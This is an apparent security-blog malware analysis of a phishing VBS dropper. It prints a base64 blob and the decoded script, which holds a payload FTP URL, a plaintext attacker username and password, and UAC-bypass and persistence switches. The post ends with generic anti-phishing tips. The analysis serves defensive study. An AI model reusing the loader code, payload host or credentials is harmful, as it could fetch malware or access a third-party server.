VBS: Learn how to use this language to analyze malicious files

By Laura Cardillo and Átila Altoé: This is an analysis of a file transformed into the VBS language. phishing received via email from a third-party account. The focus of this report is not to explain in detail how the malware itself works - but rather to present a way of identifying and decoding the payload that spreads it.

In this report, we will demonstrate how the analysis was carried out using VBS to identify and deobfuscate the malicious code and execution of this malware.

Watch the malware at work

Below is the sample extracted in question:

Figure 1: Sample file

To begin the analysis, we inspected the file via Notepad++ and noted the presence of a Powershell command to decode stringsstrings in base64. Unfortunately, the target content of this shortcut is too long for the file's properties window. Here is the string obtained:

“b24gZXJyb3IgcmVzdW1lIG5leHQNCkRpbSB3aW5zaGVsbA0KU2V0IHdpbnNoZWxsID0gV1NjcmlwdC5DcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKQ0KVGltYmFsYXRlID0gInNldHVwLnppcCINClRpbWJhbGF0ZXMgPSAic2V0eC5leGUiDQpVUkwgPSAiZnRwOi8vZnRwLmVzdGFtb3NhaW5hbmEuY29tL3d3dy9pbWFnZW5zLnppcCINClBBQ09URVVTRVIgPSAiZXN0YW1vc2FpbmFuYSINClhBTlBVU0VSID0gInBRTlBlNnZeOTFUWCINCkRpbSBCYWdhbmVGb2xkDQpCYWdhbmVGb2xkID0gd2luc2hlbGwuZXhwYW5kRW52aXJvbm1lbnRTdHJpbmdzKCIlQWxsVXNlcnNQcm9maWxlJSIpDQpEZXN0Rm9sZGVyID0gQmFnYW5lRm9sZCAmICJcU2V0WCINCkRpbSBvYmpXTUlTZXJ2aWNlLCBwcm9jZXNzSXRlbXMsIHByb2Nlc3NOYW1lDQpwcm9jZXNzTmFtZSA9ICJ3c2NyaXB0LmV4ZSINCkRpbSBqb3JkaQ0Kam9yZGkgPSBXU2NyaXB0LlNjcmlwdEZ1bGxOYW1lDQpGT1JDRSA9ICJTSU0iDQpVQUNCWVBBU1MgPSAiTkFPIg0KU2V0IHhtbCA9IENyZWF0ZU9iamVjdChTdHJSZXZlcnNlKCJ0Zm9zb3JjaU0iKSYgIi4iICYgU3RyUmV2ZXJzZSgiUFRUSExNWCIpKQ0Kc2V0IGphcmRpbVhYWFhYWCA9IENyZWF0ZU9iamVjdChQcm9mZXNzb3JhKCJjMCtcNCIsIk4wWCIpICYgIi4iICYgU3RyUmV2ZXJzZSgibm9pdGFjaWxwcEEiKSkNCkNvbnN0IGFkVHlwZUJpbmFyeSA9IDENCkNvbnN0IGFkU2F2ZUNyZWF0ZU92ZXJXcml0ZSA9IDINCkNvbnN0IGFkU2F2ZUNyZ

As it is humanly impossible to understand this type of string, we used the cyberchef tool to decode it, with which we found the following function:

on error resume next

Dim winshell

Set winshell = WScript.CreateObject("WScript.Shell")

Timbalate = "setup.zip"

Timbalates = "setx.exe"

URL = "ftp://ftp.estamosainana.com/www/imagens.zip"

PACOTEUSER = "estamosainana"

XANPUSER = "pQNPe6v^91TX"

Dim BaganeFold

BaganeFold = winshell.expandEnvironmentStrings("%AllUsersProfile%")

DestFolder = BaganeFold & "\SetX"

Dim objWMIService, processItems, processName

processName = "wscript.exe"

Dim jordi

jordi = WScript.ScriptFullName

FORCE = "YES"

UACBYPASS = "NO"

From the start of the function, you can see some points of attention such as the URL, user and password of the account carrying out the attack, or even that the attacker is using an FTP server to disseminate the malicious files, as well as the name of the files that will be used in the infection:

Figure 2: Relevant information

When we looked more closely at the function, we also saw an attempt to create a user ("Fisga"). This went through a process of Reverseprocess, thus elevating his privilege and turning him into "root".

Figure 3: Malware persistence

Finally, it should also be noted that the malware uses a specific expression at the end of the function to perform the Persistence tactic (MITRE ATT&CK) and force the user to accept "root" observed below:

Else

spin

exec

End If

ElseIf UACBYPASS = "YES" Then

spin

execc

Else

spin

exec

End If

End Function

Figure 4: Malware persistence

Recommendations

The first important tip to keep in mind is that most trustworthy companies don't ask for personal information or account details by email. This includes your bank, insurance companies and any company you do business with. If you receive an email asking for any kind of account information, delete it immediately and call the company to confirm that your account is safe.

  • Don't open attachments from suspicious or strange emails, especially Word, Excel, PowerPoint or PDF attachments.
  • A useful phishing prevention tip is to always avoid clicking on links embedded in emails, as these may be loaded with malware.
  • Another way to reduce your exposure to phishing messages is to use virus protection and anti-spam software.

Finally, it is essential to use a password manager to manage credentials. It is recommended to have a password manager, since malicious attackers will try to use discovered credentials all over the web. One of the best features of password managers is the automatic filling in of login forms to minimize clicks.

References

  1. File received via honeypot and use of Open source tools.
  2. https://www.kaspersky.com.br/resource-center/preemptive-safety/phishing-prevention-tips